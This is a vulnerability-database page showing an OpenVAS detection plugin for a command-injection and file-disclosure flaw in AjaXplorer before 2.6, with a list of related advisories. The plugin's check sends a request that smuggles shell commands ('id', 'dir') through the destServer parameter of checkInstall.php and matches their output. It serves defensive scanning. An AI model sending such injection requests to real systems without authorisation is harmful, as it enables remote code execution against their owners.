Lucene search
+L

AjaXplorer < 2.6 Multiple Vulnerabilities - Active Check

🗓️ 13 Apr 2010 00:00:00Reported by Copyright (C) 2010 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 16 Views

AjaXplorer < 2.6 Multiple Vulnerabilities. Remote command injection and local file disclosure due to inadequate user input sanitation. Impact: Arbitrary command execution and sensitive information retrieval

Related
Refs
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2010-10013
8 Aug 202518:09
attackerkb
circl
Circl
CVE-2010-10013
29 May 201815:50
circl
cnnvd
CNNVD
Sourceforge AjaXplorer 安全漏洞
8 Aug 202500:00
cnnvd
cve
CVE
CVE-2010-10013
8 Aug 202518:09
cve
cvelist
Cvelist
CVE-2010-10013 AjaXplorer < 2.6 checkInstall.php Unauthenticated RCE
8 Aug 202518:09
cvelist
euvd
EUVD
EUVD-2010-5299
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-10013
8 Aug 202519:15
nvd
ptsecurity
Positive Technologies
PT-2025-32392 · Unknown +1 · Ajaxplorer/Pydio Cells +1
8 Aug 202500:00
ptsecurity
redhatcve
RedhatCVE
CVE-2010-10013
10 Aug 202518:14
redhatcve
vulnrichment
Vulnrichment
CVE-2010-10013 AjaXplorer < 2.6 checkInstall.php Unauthenticated RCE
8 Aug 202518:09
vulnrichment
# SPDX-FileCopyrightText: 2010 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:ajaxplorer:ajaxplorer";

if (description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.100574");
  script_version("2025-08-21T05:40:06+0000");
  script_tag(name:"last_modification", value:"2025-08-21 05:40:06 +0000 (Thu, 21 Aug 2025)");
  script_tag(name:"creation_date", value:"2010-04-13 13:16:59 +0200 (Tue, 13 Apr 2010)");
  script_tag(name:"cvss_base", value:"5.1");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:H/Au:N/C:P/I:P/A:P");

  script_cve_id("CVE-2010-10013");

  script_tag(name:"qod_type", value:"remote_vul");

  script_tag(name:"solution_type", value:"VendorFix");

  script_name("AjaXplorer < 2.6 Multiple Vulnerabilities - Active Check");

  script_category(ACT_ATTACK);

  script_copyright("Copyright (C) 2010 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("gb_ajaxplorer_http_detect.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("ajaxplorer/http/detected");

  script_tag(name:"summary", value:"AjaXplorer is prone to a remote command injection vulnerability
  and a local file disclosure vulnerability because it fails to adequately sanitize user-supplied
  input data.");

  script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");

  script_tag(name:"impact", value:"Attackers can exploit this issue to execute arbitrary commands
  within the context of the affected application and to obtain potentially sensitive information
  from local files on computers running the vulnerable application.");

  script_tag(name:"affected", value:"AjaXplorer prior to version 2.6.");

  script_tag(name:"solution", value:"Update to version 2.6 or later.");

  script_xref(name:"URL", value:"https://web.archive.org/web/20131005231454/http://www.securityfocus.com/bid/39334");
  script_xref(name:"URL", value:"http://www.ajaxplorer.info/wordpress/2010/04/ajaxplorer-2-6-security-ajaxplorer-2-7-1-early-beta-for-3-0/");
  script_xref(name:"URL", value:"https://www.exploit-db.com/exploits/21993");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");

if (!port = get_app_port(cpe: CPE, service: "www"))
  exit(0);

if (!dir = get_app_location(cpe: CPE, port: port))
  exit(0);

if (dir == "/")
  dir = "";

cmds = make_array("uid=[0-9]+.*gid=[0-9]+", "id",
                  "<dir>", "dir");

foreach cmd (keys(cmds)) {
  url = dir + "/plugins/access.ssh/checkInstall.php?destServer=||" + cmds[cmd];

  if (http_vuln_check(port: port, url: url, pattern: cmd)) {
    report = http_report_vuln_url(port: port, url: url);
    security_message(port: port, data: report);
    exit(0);
  }
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Aug 2025 00:00Current
7.7High risk
Vulners AI Score7.7
CVSS 49.3
EPSS0.01163
SSVC
16